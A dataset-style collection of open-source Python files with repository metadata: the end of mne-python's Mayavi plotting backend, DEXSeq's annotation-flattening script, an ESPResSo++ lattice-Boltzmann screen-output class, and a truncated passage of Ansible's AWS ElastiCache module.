opacity=1.0, scale_mode='none', scalars=None,
backface_culling=False, colormap=None, vmin=None, vmax=None,
line_width=2., name=None):
color = _check_color(color)
with warnings.catch_warnings(record=True): # traits
if mode in ('arrow', '2darrow', '3darrow'):
self.mlab.quiver3d(x, y, z, u, v, w, mode=mode,
color=color, scale_factor=scale,
scale_mode=scale_mode,
resolution=resolution, scalars=scalars,
opacity=opacity, figure=self.fig)
elif mode == 'cone':
self.mlab.quiver3d(x, y, z, u, v, w, color=color,
mode=mode, scale_factor=scale,
opacity=opacity, figure=self.fig)
elif mode == 'cylinder':
quiv = self.mlab.quiver3d(x, y, z, u, v, w, mode=mode,
color=color, scale_factor=scale,
opacity=opacity, figure=self.fig)
quiv.glyph.glyph_source.glyph_source.height = glyph_height
quiv.glyph.glyph_source.glyph_source.center = glyph_center
quiv.glyph.glyph_source.glyph_source.resolution = \
glyph_resolution
quiv.actor.property.backface_culling = backface_culling
def text2d(self, x_window, y_window, text, size=14, color='white',
justification=None):
if color is not None:
color = _check_color(color)
size = 14 if size is None else size
with warnings.catch_warnings(record=True): # traits
text = self.mlab.text(x_window, y_window, text, color=color,
figure=self.fig)
text.property.font_size = size
text.actor.text_scale_mode = 'viewport'
if isinstance(justification, str):
text.property.justification = justification
def text3d(self, x, y, z, text, scale, color='white'):
color = _check_color(color)
with warnings.catch_warnings(record=True): # traits
self.mlab.text3d(x, y, z, text, scale=scale, color=color,
figure=self.fig)
def scalarbar(self, source, color="white", title=None, n_labels=4,
bgcolor=None):
with warnings.catch_warnings(record=True): # traits
bar = self.mlab.scalarbar(source, title=title, nb_labels=n_labels)
if color is not None:
bar.label_text_property.color = _check_color(color)
if bgcolor is not None:
from tvtk.api import tvtk
bgcolor = np.asarray(bgcolor)
bgcolor = np.append(bgcolor, 1.0) * 255.
cmap = source.module_manager.scalar_lut_manager
lut = cmap.lut
ctable = lut.table.to_array()
cbar_lut = tvtk.LookupTable()
cbar_lut.deep_copy(lut)
alphas = ctable[:, -1][:, np.newaxis] / 255.
use_lut = ctable.copy()
use_lut[:, -1] = 255.
vals = (use_lut * alphas) + bgcolor * (1 - alphas)
cbar_lut.table.from_array(vals)
cmap.scalar_bar.lookup_table = cbar_lut
def show(self):
if self.fig is not None:
_toggle_mlab_render(self.fig, True)
def close(self):
_close_3d_figure(figure=self.fig)
def set_camera(self, azimuth=None, elevation=None, distance=None,
focalpoint=None):
_set_3d_view(figure=self.fig, azimuth=azimuth,
elevation=elevation, distance=distance,
focalpoint=focalpoint)
def reset_camera(self):
renderer = getattr(self.fig.scene, 'renderer', None)
if renderer is not None:
renderer.reset_camera()
def screenshot(self, mode='rgb', filename=None):
return _take_3d_screenshot(figure=self.fig, mode=mode,
filename=filename)
def project(self, xyz, ch_names):
xy = _3d_to_2d(self.fig, xyz)
xy = dict(zip(ch_names, xy))
pts = self.fig.children[-1]
return _Projection(xy=xy, pts=pts)
def enable_depth_peeling(self):
if self.fig.scene is not None:
self.fig.scene.renderer.use_depth_peeling = True
def remove_mesh(self, surface):
if self.fig.scene is not None:
self.fig.scene.renderer.remove_actor(surface.actor)
def _mlab_figure(**kwargs):
"""Create a Mayavi figure using our defaults."""
from .._3d import _get_3d_option
fig = _import_mlab().figure(**kwargs)
# If using modern VTK/Mayavi, improve rendering with FXAA
antialias = _get_3d_option('antialias')
if antialias and hasattr(getattr(fig.scene, 'renderer', None), 'use_fxaa'):
fig.scene.renderer.use_fxaa = True
return fig
def _toggle_mlab_render(fig, render):
mlab = _import_mlab()
if mlab.options.backend != 'test':
fig.scene.disable_render = not render
def _create_mesh_surf(surf, fig=None, scalars=None, vtk_normals=True):
"""Create Mayavi mesh from MNE surf."""
mlab = _import_mlab()
x, y, z = surf['rr'].T
with warnings.catch_warnings(record=True): # traits
mesh = mlab.pipeline.triangular_mesh_source(
x, y, z, surf['tris'], scalars=scalars, figure=fig)
if vtk_normals:
mesh = mlab.pipeline.poly_data_normals(mesh)
mesh.filter.compute_cell_normals = False
mesh.filter.consistency = False
mesh.filter.non_manifold_traversal = False
mesh.filter.splitting = False
else:
# make absolutely sure these are normalized for Mayavi
nn = surf['nn'].copy()
_normalize_vectors(nn)
mesh.data.point_data.normals = nn
mesh.data.cell_data.normals = None
return mesh
def _3d_to_2d(fig, xyz):
"""Convert 3d points to a 2d perspective using a Mayavi Scene."""
_validate_type(fig, Scene, "fig", "Scene")
xyz = np.column_stack([xyz, np.ones(xyz.shape[0])])
# Transform points into 'unnormalized' view coordinates
comb_trans_mat = _get_world_to_view_matrix(fig.scene)
view_coords = np.dot(comb_trans_mat, xyz.T).T
# Divide through by the fourth element for normalized view coords
norm_view_coords = view_coords / (view_coords[:, 3].reshape(-1, 1))
# Transform from normalized view coordinates to display coordinates.
view_to_disp_mat = _get_view_to_display_matrix(fig.scene)
xy = np.dot(view_to_disp_mat, norm_view_coords.T).T
# Pull the first two columns since they're meaningful for 2d plotting
xy = xy[:, :2]
return xy
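# Sketch of the projection pipeline implemented above (the call is a
# hypothetical usage example, not from the original source):
#   world xyz --(world_to_view matrix)---> view coordinates
#             --(divide by 4th element)--> normalized view coordinates
#             --(view_to_display matrix)-> pixel xy
#   xy_pixels = _3d_to_2d(fig, np.array([[0.01, 0.02, 0.03]]))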
def _get_world_to_view_matrix(scene):
"""Return the 4x4 matrix to transform xyz space to the current view.
This is a concatenation of the model view and perspective transforms.
"""
_validate_type(scene, (MayaviScene, TVTKScene), "scene",
"TVTKScene/MayaviScene")
cam = scene.camera
# The VTK method needs the aspect ratio and near and far
# clipping planes in order to return the proper transform.
scene_size = tuple(scene.get_size())
clip_range = cam.clipping_range
aspect_ratio = float(scene_size[0]) / scene_size[1]
# Get the vtk matrix object using the aspect ratio we defined
vtk_comb_trans_mat = cam.get_composite_projection_transform_matrix(
aspect_ratio, clip_range[0], clip_range[1])
vtk_comb_trans_mat = vtk_comb_trans_mat.to_array()
return vtk_comb_trans_mat
def _get_view_to_display_matrix(scene):
"""Return the 4x4 matrix to convert view coordinates to display coords.
It's assumed that the view should take up the entire window and that the
origin of the window is in the upper left corner.
"""
_validate_type(scene, (MayaviScene, TVTKScene), "scene",
"TVTKScene/MayaviScene")
# normalized view coordinates have the origin in the middle of the space
# so we need to scale by width and height of the display window and shift
# by half width and half height. The matrix accomplishes that.
x, y = tuple(scene.get_size())
view_to_disp_mat = np.array([[x / 2.0, 0., 0., x / 2.0],
[0., -y / 2.0, 0., y / 2.0],
[0., 0., 1., 0.],
[0., 0., 0., 1.]])
return view_to_disp_mat
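# Worked example of the matrix above (not in the original source): with a
# window of size (x, y), a normalized view coordinate (0, 0, z, 1) maps to
# (x/2, y/2), the window centre, while (-1, 1, z, 1) maps to (0, 0), the
# upper-left corner, matching the convention described in the docstring.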
def _close_all():
from mayavi import mlab
mlab.close(all=True)
def _set_3d_view(figure, azimuth, elevation, focalpoint, distance):
from mayavi import mlab
with warnings.catch_warnings(record=True): # traits
with SilenceStdout():
mlab.view(azimuth, elevation, distance,
focalpoint=focalpoint, figure=figure)
mlab.draw(figure)
def _set_3d_title(figure, title, size=40):
from mayavi import mlab
text = mlab.title(text=title, figure=figure)
text.property.vertical_justification = 'top'
text.property.font_size = size
mlab.draw(figure)
def _check_3d_figure(figure):
try:
import mayavi # noqa F401
except Exception:
raise TypeError('figure must be a mayavi scene but the '
'mayavi package is not found.')
else:
from mayavi.core.scene import Scene
if not isinstance(figure, Scene):
raise TypeError('figure must be a mayavi scene.')
def _save_figure(img, filename):
from matplotlib.backends.backend_agg import FigureCanvasAgg
from matplotlib.figure import Figure
fig = Figure(frameon=False)
FigureCanvasAgg(fig)
fig.figimage(img, resize=True)
fig.savefig(filename)
def _close_3d_figure(figure):
from mayavi import mlab
mlab.close(figure)
def _take_3d_screenshot(figure, mode='rgb', filename=None):
from mayavi import mlab
from mne.viz.backends.renderer import MNE_3D_BACKEND_TESTING
if MNE_3D_BACKEND_TESTING:
ndim = 3 if mode == 'rgb' else 4
if figure.scene is None:
figure_size = figure._window_size
else:
figure_size = figure.scene._renwin.size
return np.zeros(tuple(figure_size) + (ndim,), np.uint8)
else:
from pyface.api import GUI
gui = GUI()
gui.process_events()
with warnings.catch_warnings(record=True): # traits
img = mlab.screenshot(figure, mode=mode)
if isinstance(filename, str):
_save_figure(img, filename)
return img
@contextmanager
def _testing_context(interactive):
mlab = _import_mlab()
orig_backend = mlab.options.backend
mlab.options.backend = 'test'
try:
yield
finally:
mlab.options.backend = orig_backend
|
Teekuningas/mne-python
|
mne/viz/backends/_pysurfer_mayavi.py
|
Python
|
bsd-3-clause
| 20,456
|
[
"Mayavi",
"VTK"
] |
a6d22b7c966cf93d7295e69b48361d970a5835ce70bacb23a5f9a75a8c6be839
|
#!/usr/bin/env python
import sys, collections, itertools, os.path, optparse
optParser = optparse.OptionParser(
usage = "python %prog [options] <in.gtf> <out.gff>",
description=
"Script to prepare annotation for DEXSeq." +
"This script takes an annotation file in Ensembl GTF format" +
"and outputs a 'flattened' annotation file suitable for use " +
"with the count_in_exons.py script ",
epilog =
"Written by Simon Anders (sanders@fs.tum.de), European Molecular Biology " +
"Laboratory (EMBL). (c) 2010. Released under the terms of the GNU General " +
"Public License v3. Part of the 'DEXSeq' package." )
optParser.add_option( "-r", "--aggregate", type="choice", dest="aggregate",
choices = ( "no", "yes" ), default = "yes",
help = "'yes' or 'no'. Indicates whether two or more genes sharing an exon should be merged into an 'aggregate gene'. If 'no', the exons that cannot be assigned to a single gene are ignored." )
(opts, args) = optParser.parse_args()
if len( args ) != 2:
sys.stderr.write( "Script to prepare annotation for DEXSeq.\n\n" )
sys.stderr.write( "Usage: python %s <in.gtf> <out.gff>\n\n" % os.path.basename(sys.argv[0]) )
sys.stderr.write( "This script takes an annotation file in Ensembl GTF format\n" )
sys.stderr.write( "and outputs a 'flattened' annotation file suitable for use\n" )
sys.stderr.write( "with the count_in_exons.py script.\n" )
sys.exit(1)
try:
import HTSeq
except ImportError:
sys.stderr.write( "Could not import HTSeq. Please install the HTSeq Python framework\n" )
sys.stderr.write( "available from http://www-huber.embl.de/users/anders/HTSeq\n" )
sys.exit(1)
gtf_file = args[0]
out_file = args[1]
aggregateGenes = opts.aggregate == "yes"
# Step 1: Store all exons with their gene and transcript ID
# in a GenomicArrayOfSets
exons = HTSeq.GenomicArrayOfSets( "auto", stranded=True )
for f in HTSeq.GFF_Reader( gtf_file ):
if f.type != "exon":
continue
f.attr['gene_id'] = f.attr['gene_id'].replace( ":", "_" )
exons[f.iv] += ( f.attr['gene_id'], f.attr['transcript_id'] )
# Step 2: Form sets of overlapping genes
# We produce the dict 'gene_sets', whose values are sets of gene IDs. Each set
# contains IDs of genes that overlap, i.e., share bases (on the same strand).
# The keys of 'gene_sets' are the IDs of all genes, and each key refers to
# the set that contains the gene.
# Each gene set forms an 'aggregate gene'.
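# Small illustration of the aggregation (gene IDs are hypothetical): if gene A
# and gene B share exonic bases on the same strand, then after this step
# gene_sets['A'] is gene_sets['B'] == {'A', 'B'}, and in Step 3 they will be
# flattened into a single aggregate gene with an ID such as 'A+B'.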
if aggregateGenes == True:
gene_sets = collections.defaultdict( lambda: set() )
for iv, s in exons.steps():
# For each step, make a set, 'full_set', of all the gene IDs occurring
# in the present step, and also add all those gene IDs which have been
# seen earlier to co-occur with each of the currently present gene IDs.
full_set = set()
for gene_id, transcript_id in s:
full_set.add( gene_id )
full_set |= gene_sets[ gene_id ]
# Make sure that all genes that are now in full_set get associated
# with full_set, i.e., get to know about their new partners
for gene_id in full_set:
assert gene_sets[ gene_id ] <= full_set
gene_sets[ gene_id ] = full_set
# Step 3: Go through the steps again to get the exonic sections. Each step
# becomes an 'exonic part'. The exonic part is associated with an
# aggregate gene, i.e., a gene set as determined in the previous step,
# and a transcript set, containing all transcripts that occur in the step.
# The results are stored in the dict 'aggregates', which contains, for each
# aggregate ID, a list of all its exonic_part features.
aggregates = collections.defaultdict( lambda: list() )
for iv, s in exons.steps( ):
# Skip empty steps
if len(s) == 0:
continue
gene_id = list(s)[0][0]
## if aggregateGenes=FALSE, ignore the exons associated with more than one gene ID
if aggregateGenes == False:
check_set = set()
for geneID, transcript_id in s:
check_set.add( geneID )
if( len( check_set ) > 1 ):
continue
else:
aggregate_id = gene_id
# Take one of the gene IDs, find the others via gene sets, and
# form the aggregate ID from all of them
else:
assert set( gene_id for gene_id, transcript_id in s ) <= gene_sets[ gene_id ]
aggregate_id = '+'.join( gene_sets[ gene_id ] )
# Make the feature and store it in 'aggregates'
f = HTSeq.GenomicFeature( aggregate_id, "exonic_part", iv )
f.source = os.path.basename( sys.argv[0] )
# f.source = "camara"
f.attr = {}
f.attr[ 'gene_id' ] = aggregate_id
transcript_set = set( ( transcript_id for gene_id, transcript_id in s ) )
f.attr[ 'transcripts' ] = '+'.join( transcript_set )
aggregates[ aggregate_id ].append( f )
# Step 4: For each aggregate, number the exonic parts
aggregate_features = []
for l in aggregates.values():
for i in xrange( len(l)-1 ):
assert l[i].name == l[i+1].name, str(l[i+1]) + " has wrong name"
assert l[i].iv.end <= l[i+1].iv.start, str(l[i+1]) + " starts too early"
if l[i].iv.chrom != l[i+1].iv.chrom:
raise ValueError, "Same name found on two chromosomes: %s, %s" % ( str(l[i]), str(l[i+1]) )
if l[i].iv.strand != l[i+1].iv.strand:
raise ValueError, "Same name found on two strands: %s, %s" % ( str(l[i]), str(l[i+1]) )
aggr_feat = HTSeq.GenomicFeature( l[0].name, "aggregate_gene",
HTSeq.GenomicInterval( l[0].iv.chrom, l[0].iv.start,
l[-1].iv.end, l[0].iv.strand ) )
aggr_feat.source = os.path.basename( sys.argv[0] )
aggr_feat.attr = { 'gene_id': aggr_feat.name }
for i in xrange( len(l) ):
l[i].attr['exonic_part_number'] = "%03d" % ( i+1 )
aggregate_features.append( aggr_feat )
# Step 5: Sort the aggregates, then write everything out
aggregate_features.sort( key = lambda f: ( f.iv.chrom, f.iv.start ) )
fout = open( out_file, "w" )
for aggr_feat in aggregate_features:
fout.write( aggr_feat.get_gff_line() )
for f in aggregates[ aggr_feat.name ]:
fout.write( f.get_gff_line() )
fout.close()
|
g1o/trinityrnaseq
|
trinity-plugins/DEXseq_util/dexseq_prepare_annotation.py
|
Python
|
bsd-3-clause
| 6,148
|
[
"HTSeq"
] |
6296b47314e0e774ee8d446a24660a75832beacf79040d0f6c4e00a5a3bc80aa
|
# Copyright (C) 2012-2016
# Max Planck Institute for Polymer Research
# Copyright (C) 2008-2011
# Max-Planck-Institute for Polymer Research & Fraunhofer SCAI
#
# This file is part of ESPResSo++.
#
# ESPResSo++ is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# ESPResSo++ is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
r"""
Computes and outputs to the screen the simulation progress (finished step) and
controls mass flux conservation when using MD-to-LB coupling. Ideally, the sum of mass
fluxes should be :math:`0`, i.e. :math:`j_{LB} + j_{MD} = 0`.
.. py:class:: espressopp.analysis.LBOutputScreen(system,lb)
:param shared_ptr system: system object defined earlier in the python-script
:param lb_object lb: lattice boltzmann object defined earlier in the python-script
Example:
>>> # initialise output to the screen
>>> outputScreen = espressopp.analysis.LBOutputScreen(system,lb)
>>>
>>> # initialise external analysis object with previously created output object
>>> # and periodicity of invocation (steps):
>>> extAnalysis = espressopp.integrator.ExtAnalyze(outputScreen,100)
>>>
>>> # add the external analysis object as an extension to the integrator
>>> integrator.addExtension( extAnalysis )
"""
from espressopp.esutil import cxxinit
from espressopp import pmi
from espressopp.analysis.LBOutput import *
from _espressopp import analysis_LBOutput_Screen
class LBOutputScreenLocal(LBOutputLocal, analysis_LBOutput_Screen):
def __init__(self, system, latticeboltzmann):
if not (pmi._PMIComm and pmi._PMIComm.isActive()) or pmi._MPIcomm.rank in pmi._PMIComm.getMPIcpugroup():
cxxinit(self, analysis_LBOutput_Screen, system, latticeboltzmann)
if pmi.isController :
class LBOutputScreen(LBOutput):
__metaclass__ = pmi.Proxy
pmiproxydefs = dict(
cls = 'espressopp.analysis.LBOutputScreenLocal',
pmicall = ["writeOutput", "getLBMom", "getMDMom"]
)
|
kkreis/espressopp
|
src/analysis/LBOutputScreen.py
|
Python
|
gpl-3.0
| 2,490
|
[
"ESPResSo"
] |
955b3ea39c2803d7fb3b546ba82a59f6999f98efd6949df648562205444333d2
|
#!/usr/bin/python
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = """
---
module: elasticache
short_description: Manage cache clusters in Amazon Elasticache.
description:
- Manage cache clusters in Amazon Elasticache.
- Returns information about the specified cache cluster.
version_added: "1.4"
author: "Jim Dalton (@jsdalton)"
options:
state:
description:
- C(absent) or C(present) are idempotent actions that will create or destroy a cache cluster as needed. C(rebooted) will reboot the cluster, resulting in a momentary outage.
choices: ['present', 'absent', 'rebooted']
required: true
name:
description:
- The cache cluster identifier
required: true
engine:
description:
- Name of the cache engine to be used (memcached or redis)
required: false
default: memcached
cache_engine_version:
description:
- The version number of the cache engine
required: false
default: none
node_type:
description:
- The compute and memory capacity of the nodes in the cache cluster
required: false
default: cache.m1.small
num_nodes:
description:
- The initial number of cache nodes that the cache cluster will have
required: false
cache_port:
description:
- The port number on which each of the cache nodes will accept connections
required: false
default: none
parameter_group:
description:
- Specify non-default parameter group names to be associated with cache cluster
required: false
default: None
cache_subnet_group:
description:
- The subnet group name to associate with. Only use if inside a vpc. Required if inside a vpc
required: conditional
default: None
version_added: "2.0"
security_group_ids:
description:
- A list of vpc security group names to associate with this cache cluster. Only use if inside a vpc
required: false
default: ['default']
version_added: "1.6"
cache_security_groups:
description:
- A list of cache security group names to associate with this cache cluster. Must be an empty list if inside a vpc
required: false
default: ['default']
zone:
description:
- The EC2 Availability Zone in which the cache cluster will be created
required: false
default: None
wait:
description:
- Wait for cache cluster result before returning
required: false
default: yes
choices: [ "yes", "no" ]
hard_modify:
description:
- Whether to destroy and recreate an existing cache cluster if necessary in order to modify its state
required: false
default: no
choices: [ "yes", "no" ]
region:
description:
- The AWS region to use. If not specified then the value of the AWS_REGION or EC2_REGION environment variable, if any, is used.
required: true
default: null
aliases: ['aws_region', 'ec2_region']
extends_documentation_fragment: aws
"""
EXAMPLES = """
# Note: None of these examples set aws_access_key, aws_secret_key, or region.
# It is assumed that their matching environment variables are set.
# Basic example
- elasticache:
name: "test-please-delete"
state: present
engine: memcached
cache_engine_version: 1.4.14
node_type: cache.m1.small
num_nodes: 1
cache_port: 11211
cache_security_groups:
- default
zone: us-east-1d
# Ensure cache cluster is gone
- elasticache:
name: "test-please-delete"
state: absent
# Reboot cache cluster
- elasticache:
name: "test-please-delete"
state: rebooted
"""
import sys
import time
try:
import boto
from boto.elasticache.layer1 import ElastiCacheConnection
from boto.regioninfo import RegionInfo
HAS_BOTO = True
except ImportError:
HAS_BOTO = False
class ElastiCacheManager(object):
"""Handles elasticache creation and destruction"""
EXIST_STATUSES = ['available', 'creating', 'rebooting', 'modifying']
def __init__(self, module, name, engine, cache_engine_version, node_type,
num_nodes, cache_port, parameter_group, cache_subnet_group,
cache_security_groups, security_group_ids, zone, wait,
hard_modify, region, **aws_connect_kwargs):
self.module = module
self.name = name
self.engine = engine
self.cache_engine_version = cache_engine_version
self.node_type = node_type
self.num_nodes = num_nodes
self.cache_port = cache_port
self.parameter_group = parameter_group
self.cache_subnet_group = cache_subnet_group
self.cache_security_groups = cache_security_groups
self.security_group_ids = security_group_ids
self.zone = zone
self.wait = wait
self.hard_modify = hard_modify
self.region = region
self.aws_connect_kwargs = aws_connect_kwargs
self.changed = False
self.data = None
self.status = 'gone'
self.conn = self._get_elasticache_connection()
self._refresh_data()
def ensure_present(self):
"""Ensure cache cluster exists or create it if not"""
if self.exists():
self.sync()
else:
self.create()
def ensure_absent(self):
"""Ensure cache cluster is gone or delete it if not"""
self.delete()
def ensure_rebooted(self):
"""Ensure cache cluster is gone or delete it if not"""
self.reboot()
def exists(self):
"""Check if cache cluster exists"""
return self.status in self.EXIST_STATUSES
def create(self):
"""Create an ElastiCache cluster"""
if self.status == 'available':
return
if self.status in ['creating', 'rebooting', 'modifying']:
if self.wait:
self._wait_for_status('available')
return
if self.status == 'deleting':
if self.wait:
self._wait_for_status('gone')
else:
msg = "'%s' is currently deleting. Cannot create."
self.module.fail_json(msg=msg % self.name)
try:
response = self.conn.create_cache_cluster(cache_cluster_id=self.name,
num_cache_nodes=self.num_nodes,
cache_node_type=self.node_type,
engine=self.engine,
engine_version=self.cache_engine_version,
cache_security_group_names=self.cache_security_groups,
security_group_ids=self.security_group_ids,
cache_parameter_group_name=self.parameter_group,
cache_subnet_group_name=self.cache_subnet_group,
preferred_availability_zone=self.zone,
port=self.cache_port)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['CreateCacheClusterResponse']['CreateCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('available')
return True
def delete(self):
"""Destroy an ElastiCache cluster"""
if self.status == 'gone':
return
if self.status == 'deleting':
if self.wait:
self._wait_for_status('gone')
return
if self.status in ['creating', 'rebooting', 'modifying']:
if self.wait:
self._wait_for_status('available')
else:
msg = "'%s' is currently %s. Cannot delete."
self.module.fail_json(msg=msg % (self.name, self.status))
try:
response = self.conn.delete_cache_cluster(cache_cluster_id=self.name)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['DeleteCacheClusterResponse']['DeleteCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('gone')
def sync(self):
"""Sync settings to cluster if required"""
if not self.exists():
msg = "'%s' is %s. Cannot sync."
self.module.fail_json(msg=msg % (self.name, self.status))
if self.status in ['creating', 'rebooting', 'modifying']:
if self.wait:
self._wait_for_status('available')
else:
# Cluster can only be synced if available. If we can't wait
# for this, then just be done.
return
if self._requires_destroy_and_create():
if not self.hard_modify:
msg = "'%s' requires destructive modification. 'hard_modify' must be set to true to proceed."
self.module.fail_json(msg=msg % self.name)
if not self.wait:
msg = "'%s' requires destructive modification. 'wait' must be set to true."
self.module.fail_json(msg=msg % self.name)
self.delete()
self.create()
return
if self._requires_modification():
self.modify()
def modify(self):
"""Modify the cache cluster. Note it's only possible to modify a few select options."""
nodes_to_remove = self._get_nodes_to_remove()
try:
response = self.conn.modify_cache_cluster(cache_cluster_id=self.name,
num_cache_nodes=self.num_nodes,
cache_node_ids_to_remove=nodes_to_remove,
cache_security_group_names=self.cache_security_groups,
cache_parameter_group_name=self.parameter_group,
security_group_ids=self.security_group_ids,
apply_immediately=True,
engine_version=self.cache_engine_version)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['ModifyCacheClusterResponse']['ModifyCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('available')
def reboot(self):
"""Reboot the cache cluster"""
if not self.exists():
msg = "'%s' is %s. Cannot reboot."
self.module.fail_json(msg=msg % (self.name, self.status))
if self.status == 'rebooting':
return
if self.status in ['creating', 'modifying']:
if self.wait:
self._wait_for_status('available')
else:
msg = "'%s' is currently %s. Cannot reboot."
self.module.fail_json(msg=msg % (self.name, self.status))
# Collect ALL nodes for reboot
cache_node_ids = [cn['CacheNodeId'] for cn in self.data['CacheNodes']]
try:
response = self.conn.reboot_cache_cluster(cache_cluster_id=self.name,
cache_node_ids_to_reboot=cache_node_ids)
except boto.exception.BotoServerError, e:
self.module.fail_json(msg=e.message)
cache_cluster_data = response['RebootCacheClusterResponse']['RebootCacheClusterResult']['CacheCluster']
self._refresh_data(cache_cluster_data)
self.changed = True
if self.wait:
self._wait_for_status('available')
def get_info(self):
"""Return basic info about the cache cluster"""
info = {
'name': self.name,
'status': self.status
}
if self.data:
info['data'] = self.data
return info
def _wait_for_status(self, awaited_status):
"""Wait for status to change from present status to awaited_status"""
status_map = {
'creating': 'available',
'rebooting': 'available',
'modifying': 'available',
'deleting': 'gone'
}
if self.status == awaited_status:
# No need to wait, we're already done
return
if status_map[self.status] != awaited_status:
msg = "Invalid awaited status. '%s' cannot transition to '%s'"
self.module.fail_json(msg=msg % (self.status, awaited_status))
if awaited_status not in set(status_map.values()):
msg = "'%s' is not a valid awaited status."
self.module.fail_json(msg=msg % awaited_status)
while True:
time.sleep(1)
self._refresh_data()
if self.status == awaited_status:
break
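# Illustration of the transitions encoded in status_map above (hypothetical
# call): a cluster in 'creating' can only be awaited until 'available', so
# calling _wait_for_status('gone') while 'creating' fails fast with
# "Invalid awaited status" instead of polling forever.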
def _requires_modification(self):
"""Check if cluster requires (nondestructive) modification"""
# Check modifiable data attributes
modifiable_data = {
'NumCacheNodes': self.num_nodes,
'EngineVersion': self.cache_engine_version
}
for key, value in modifiable_data.iteritems():
if self.data[key] != value:
return True
# Check cache security groups
cache_security_groups = []
for sg in self.data['CacheSecurityGroups']:
cache_security_groups.append(sg['CacheSecurityGroupName'])
if set(cache_security_groups) - set(self.cache_security_groups):
return True
# check vpc security groups
vpc_security_groups = []
security_groups = self.data['SecurityGroups'] or []
for sg in security_groups:
vpc_security_groups.append(sg['SecurityGroupId'])
if set(vpc_security_groups) - set(self.security_group_ids):
return True
return False
def _requires_destroy_and_create(self):
"""
Check whether a destroy and create is required to synchronize cluster.
"""
unmodifiable_data = {
'node_type': self.data['CacheNodeType'],
'engine': self.data['Engine'],
'cache_port': self._get_port()
}
# Only check for modifications if zone is specified
if self.zone is not None:
unmodifiable_data['zone'] = self.data['PreferredAvailabilityZone']
for key, value in unmodifiable_data.iteritems():
if getattr(self, key) != value:
return True
return False
def _get_elasticache_connection(self):
"""Get an elasticache connection"""
try:
endpoint = "elasticache.%s.amazonaws.com" % self.region
connect_region = RegionInfo(name=self.region, endpoint=endpoint)
return ElastiCacheConnection(
region=connect_region,
**self.aws_connect_kwargs
)
except boto.exception.NoAuthHandlerFound, e:
self.module.fail_json(msg=e.message)
def _get_port(self):
"""Get the port. Where this information is retrieved from is engine dependent."""
if self.data['Engine'] == 'memcached':
return self.data['ConfigurationEndpoint']['Port']
elif self.data['Engine'] == 'redis':
# Redis only supports a single node (presently) so just use
# the first and only
return self.data['CacheNodes'][0]['Endpoint']['Port']
def _refresh_data(self, cache_cluster_data=None):
"""Refresh data about this cache cluster"""
if cache_cluster_data is None:
try:
response = self.conn.describe_cache_clusters(cache_cluster_id=self.name,
show_cache_node_info=True)
except boto.exception.BotoServerError:
self.data = None
self.status = 'gone'
return
cache_cluster_data = response['DescribeCacheClustersResponse']['DescribeCacheClustersResult']['CacheClusters'][0]
self.data = cache_cluster_data
self.status = self.data['CacheClusterStatus']
# The documentation for elasticache lies -- status on rebooting is set
# to 'rebooting cache cluster nodes' instead of 'rebooting'. Fix it
# here to make status checks etc. more sane.
if self.status == 'rebooting cache cluster nodes':
self.status = 'rebooting'
def _get_nodes_to_remove(self):
"""If there are nodes to remove, it figures out which need to be removed"""
num_nodes_to_remove = self.data['NumCacheNodes'] - self.num_nodes
if num_nodes_to_remove <= 0:
return None
if not self.hard_modify:
msg = "'%s' requires removal of cache nodes. 'hard_modify' must be set to true to proceed."
self.module.fail_json(msg=msg % self.name)
cache_node_ids = [cn['CacheNodeId'] for cn in self.data['CacheNodes']]
return cache_node_ids[-num_nodes_to_remove:]
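# Worked example of the removal rule above (node IDs are illustrative only):
# with NumCacheNodes == 5 and num_nodes == 3, the last two node IDs returned
# by describe_cache_clusters are selected for removal, e.g. ['0004', '0005'].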
def main():
argument_spec = ec2_argument_spec()
default = object()
argument_spec.update(dict(
state={'required': True, 'choices': ['present', 'absent', 'rebooted']},
name={'required': True},
engine={'required': False, 'default': 'memcached'},
cache_engine_version={'required': False},
node_type={'required': False, 'default': 'cache.m1.small'},
num_nodes={'required': False, 'default': None, 'type': 'int'},
parameter_group={'required': False, 'default': None},
cache_port={'required': False, 'type': 'int'},
cache_subnet_group={'required': False, 'default': None},
cache_security_groups={'required': False, 'default': [default],
'type': 'list'},
security_group_ids={'required': False, 'default': [],
'type': 'list'},
zone={'required': False, 'default': None},
wait={'required': False, 'type' : 'bool', 'default': True},
hard_modify={'required': False, 'type': 'bool', 'default': False}
)
)
module = AnsibleModule(
argument_spec=argument_spec,
)
if not HAS_BOTO:
module.fail_json(msg='boto required for this module')
region, ec2_url, aws_connect_kwargs = get_aws_connection_info(module)
name = module.params['name']
state = module.params['state']
engine = module.params['engine']
cache_engine_version = module.params['cache_engine_version']
node_type = module.params['node_type']
num_nodes = module.params['num_nodes']
cache_port = module.params['cache_port']
cache_subnet_group = module.params['cache_subnet_group']
cache_security_groups = module.params['cache_security_groups']
security_group_ids = module.params['security_group_ids']
zone = module.params['zone']
wait = module.params['wait']
hard_modify = module.params['hard_modify']
parameter_group = module.params['parameter_group']
if cache_subnet_group and cache_security_groups == [default]:
cache_security_groups = []
if cache_subnet_group and cache_security_groups:
module.fail_json(msg="Can't specify both cache_subnet_group and cache_security_groups")
if cache_security_groups == [default]:
cache_security_groups = ['default']
